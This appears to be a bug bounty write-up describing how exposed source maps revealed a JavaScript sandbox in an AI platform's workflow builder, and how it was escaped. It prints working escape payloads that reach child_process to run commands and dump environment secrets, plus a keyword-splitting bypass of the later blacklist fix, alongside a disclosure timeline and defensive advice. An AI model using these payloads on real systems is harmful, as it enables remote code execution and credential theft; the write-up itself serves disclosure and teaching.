Finding security flaws in popular bug bounty programs can feel impossible sometimes.

Every researcher is testing the same targets with the same methods. The easy vulnerabilities are found quickly.


But there's a simple trick to find fresh opportunities.

Here's the Google dork that changed everything:

("Bug Bounty Program" | ("Vulnerability" & "Reward")) -bugcrowd -hackerone -yeswehack -intigriti -immunefi

Add the "Past week" filter. Suddenly, you're looking at programs nobody has tested yet.

That's how an AI platform became my next target.

Discovery Story

The company had just launched its bug bounty program. Everything was in-scope and ready for testing.

During reconnaissance, I found a common misconfiguration: directory listing was enabled.

Most directories contained nothing interesting. But then I noticed multiple .js.map files.

What are source maps?

They're development files that map minified JavaScript back to source code. Variables, functions, comments — everything developers write.

In production, they should never be exposed. But here they were, completely accessible.

Using an open-source tool called sourcemapper, I reconstructed the original TypeScript code:

python sourcemapper.py -o recovered_code https://target.com/static/js/file.js.map
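There's no magic in that step: a .js.map file is plain JSON, and whenever the build ships a sourcesContent array, the original files can be dumped with a few lines of Node. A minimal sketch (the file path and map contents here are made up for illustration):

```javascript
// Minimal sketch: dump the original sources embedded in a source map.
// Works whenever the build shipped "sourcesContent" (many do).
function extractSources(rawMap) {
  const map = JSON.parse(rawMap);
  const sources = map.sources || [];
  const contents = map.sourcesContent || [];
  return sources
    .map((src, i) => ({ path: src, content: contents[i] }))
    .filter((entry) => typeof entry.content === 'string');
}

// Inline example map; in practice you'd read the downloaded file,
// e.g. require('fs').readFileSync('file.js.map', 'utf8').
const rawMap = JSON.stringify({
  version: 3,
  sources: ['webpack://app/src/utils.ts'],
  sourcesContent: ['export const sandboxedEval = () => { /* ... */ };'],
  mappings: '',
});

for (const { path: src, content } of extractSources(rawMap)) {
  console.log(`--- ${src} ---`);
  console.log(content);
}
```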

Technical Deep Dive

The recovered code revealed something concerning in utils.ts:

There was a function called sandboxedEval. It was meant to execute user code safely in the platform's workflow builder.

The implementation had problems:

const sanitizeCode = (code: string): string => {
  const dangerousPatterns = [
    /process\./g,
    /require\(/g,
    // ... more patterns
  ];
  
  let sanitizedCode = code;
  dangerousPatterns.forEach((pattern) => {
    if (pattern.test(sanitizedCode)) {
      throw new Error('Cannot execute code with dangerous patterns');
    }
    sanitizedCode = sanitizedCode.replace(pattern, '/* blocked */');
  });
  return sanitizedCode;
};

Regex-based sanitization is fundamentally weak: it blocks literal string patterns, not behavior, so any alternative spelling of the same operation slips straight through.
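To see why, here's a re-creation of that filter, simplified to the two patterns quoted above, run against a payload that reaches the same object without ever matching them. The pattern list comes from the recovered code; the bypass string is my own:

```javascript
// Re-creation of the filter with the two patterns quoted above.
const dangerousPatterns = [/process\./g, /require\(/g];

const passesFilter = (code) =>
  !dangerousPatterns.some((pattern) => pattern.test(code));

// Blocked: the literal "process." matches the first pattern.
const blocked = 'process.env';

// Not blocked: bracket notation plus string concatenation reaches
// the exact same property without containing either literal.
const bypass = "this['pro' + 'cess']['env']";

console.log(passesFilter(blocked)); // false
console.log(passesFilter(bypass));  // true
```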

Then came the real issue:

const func = new Function(
  'sandbox',
  `with (sandbox) { return (async function() { ${updatedCode} })(); }`
);

new Function() combined with a with statement? That's a sandbox escape waiting to happen.
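The problem is easy to demonstrate: with (sandbox) only intercepts names that actually exist on the sandbox object, and anything else falls through to the enclosing scope, which for a new Function() is the global scope. This sketch mirrors the pattern above, simplified to a synchronous wrapper with a hypothetical sandbox:

```javascript
// new Function() builds functions in the global scope, and
// with(sandbox) only shadows properties sandbox actually has.
const runSandboxed = (code, sandbox) => {
  const func = new Function(
    'sandbox',
    `with (sandbox) { return (function() { ${code} })(); }`
  );
  return func(sandbox);
};

// "Safe" lookups hit the sandbox as intended...
console.log(runSandboxed('return x;', { x: 42 })); // 42

// ...but any name missing from the sandbox resolves globally.
// In Node, that means the real process object is reachable.
console.log(runSandboxed('return typeof process;', {})); // "object"
```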

Exploit Development

The question became: Could this JS sandbox be bypassed?

Step 1: Access the global object

let globalObj = (function() { return this; })();

In non-strict mode, this returns the global object. The first barrier was crossed.
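You can verify this behavior in isolation. The sketch wraps the call in Function() so it stays in sloppy mode even when run from a strict-mode module; under strict mode the same trick yields undefined instead:

```javascript
// In non-strict code, `this` inside a plain function call defaults
// to the global object. Function() bodies are always non-strict,
// so this works even if the surrounding file is a strict module.
const getGlobal = new Function('return (function () { return this; })();');
console.log(getGlobal() === globalThis); // true

// Strict mode closes this hole: `this` is undefined instead.
const strictThis = (function () { 'use strict'; return this; })();
console.log(strictThis === undefined); // true
```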

Step 2: Reach the required function

let requireFunc = globalObj.constructor.constructor(
  "return this['process']['mainModule']['require']"
)();

This uses JavaScript's flexibility against itself. The Function constructor creates functions in the global scope.
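Concretely, every object's constructor chain leads back to Function itself: obj.constructor is a function, and that function's own .constructor is the Function constructor. Any value the sandbox exposes is a foothold:

```javascript
// Any plain object leads to the Function constructor in two hops:
// {} -> Object (its constructor) -> Function (Object's constructor).
const obj = {};
const FunctionCtor = obj.constructor.constructor;
console.log(FunctionCtor === Function); // true

// Functions built this way execute in the global scope, so Node's
// global `process` object is directly visible to them.
const leak = FunctionCtor('return typeof process;');
console.log(leak()); // "object"
```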

Step 3: Execute commands

let childProcess = requireFunc('child_process');
let output = childProcess.exe[c]Sync('env').toString();
logFunc(output);

Note: exe[c]Sync is written this way to comply with platform policies. It represents the command execution method.

The complete exploit payload:

let globalObj = (function() { return this; })();
let requireFunc = globalObj.constructor.constructor(
  "return this['process']['mainModule']['require']"
)();
let childProcess = requireFunc('child_process');
let output = childProcess.exe[c]Sync('env').toString();
logFunc(output);

Impact & Proof

When I tested this code execution payload, the results were shocking.

Over 230 environment variables were exposed:

AWS_ACCESS_KEY_ID=[REDACTED]
AWS_SECRET_ACCESS_KEY=[REDACTED]
GITHUB_ACCESS_TOKEN=ghp_[REDACTED]
OPENAI_API_KEY=sk-[REDACTED]
STRIPE_SECRET_KEY=sk_live_[REDACTED]
POSTGRES_URL=postgres://user:pass@host/db

The list went on: database credentials, API keys, encryption keys, and service tokens.

This wasn't just a theoretical flaw. I had achieved full Remote Code Execution (RCE). An attacker could:

  1. Read all sensitive data
  2. Execute arbitrary system commands
  3. Move to other connected systems
  4. Deploy malicious software

The security flaw was critical by any standard.

Responsible Disclosure Timeline

July 23, 2025: I submitted two reports:

  1. Exposed JavaScript Source Maps via Directory Listing [Low Severity]
  2. Remote Code Execution via Insecure JavaScript Sandbox Bypass [Critical Severity]

Same day response from the CTO:

"Thank you for your detailed report and for bringing this critical issue to our attention. We acknowledge the severity of the vulnerability you have identified…"

The issues were patched within days.

September 18, 2025: I received a reward of $2X0 for both findings combined.

When I questioned the severity downgrade from Critical to Medium, the CTO explained:

"We classified both vulnerabilities as dependent, meaning the second couldn't have been exploited without the first…"

Later, the CEO added:

"With regard to the RCE observation, it was associated with a widely exploited zero-day vulnerability originating from a third-party Java library."

There was a small problem with that statement: the vulnerable code wasn't a third-party Java library at all.

It was in their own utils.ts file. Written by their team. Maintained by their team.

The Unfixed Vulnerability

Months later, I retested the same functionality.

The "fix" was revealing: they had simply blacklisted keywords from my original payload.

const dangerousPatterns = [
  /process\./g,
  /require\(/g,
  /child_process/g,
  /mainModule/g,
  /constructor\(/g,
  /execSync\(/g,
];

Blacklisting never works. The sandbox escape was still possible with slight modifications:

let globalObj = (function() { return this; })();
let requireFunc = globalObj['constructor']['constructor'](
  "return this['process']['main'+'Module']['require']"
)();
let output = requireFunc('child_'+'process')['execSync']('id').toString();
logFunc(output);

The same code execution capability remained. The flaw hadn't been fixed; only my specific payload strings had been filtered.
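You can check the patched list against the bypass yourself: once every blocked keyword is split or reached via bracket notation, none of the six patterns fire. The pattern list is copied from the recovered patch; the payload string is the bypass above:

```javascript
// The patched blacklist, as recovered from the updated code.
const dangerousPatterns = [
  /process\./g,
  /require\(/g,
  /child_process/g,
  /mainModule/g,
  /constructor\(/g,
  /execSync\(/g,
];

// The bypass payload: bracket notation defeats /process\./ and
// /constructor\(/, string splitting defeats the literal keywords.
const bypassPayload = `
let globalObj = (function() { return this; })();
let requireFunc = globalObj['constructor']['constructor'](
  "return this['process']['main'+'Module']['require']"
)();
let output = requireFunc('child_'+'process')['execSync']('id').toString();
`;

const flagged = dangerousPatterns.filter((p) => p.test(bypassPayload));
console.log(flagged.length); // 0 -- every pattern sails past the payload
```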

Lessons & Takeaways

For developers:

  1. Never expose source maps in production
  • Configure build tools to exclude .map files
  • Disable directory listing on web servers
  • Add source map files to .gitignore

  2. Avoid custom JavaScript sandboxes
  • Use established solutions like isolated-vm
  • Run untrusted code in separate containers
  • Implement proper process isolation

  3. Never rely on regex blacklists
  • Use allowlists instead of blocklists
  • Implement proper parsing and validation
  • Assume attackers will find bypasses

For security researchers:

  1. Look for source maps
  • They're gold mines for finding vulnerabilities
  • Many companies forget to remove them
  • Tools like sourcemapper make analysis easy

  2. Test sandbox implementations thoroughly
  • Assume they're vulnerable until proven otherwise
  • Focus on global object access
  • Test prototype pollution vectors

  3. Persist through reward disappointments
  • Some companies will downplay findings
  • The real value is in the learning
  • Document everything thoroughly
Conclusion

This journey taught me something important.

The real satisfaction in security research isn't in the bounty amount. It's in finding what others missed. It's in understanding systems deeply enough to see their weaknesses.

The AI platform fixed its immediate issue. But the pattern continues elsewhere. Every week, new companies launch programs. New code gets deployed. New mistakes get made.

Your turn: Have you found similar vulnerabilities? What lessons have you learned from responsible disclosure?

Share your stories below. Let's learn from each other.

And if you're building with JavaScript — please, check your source maps.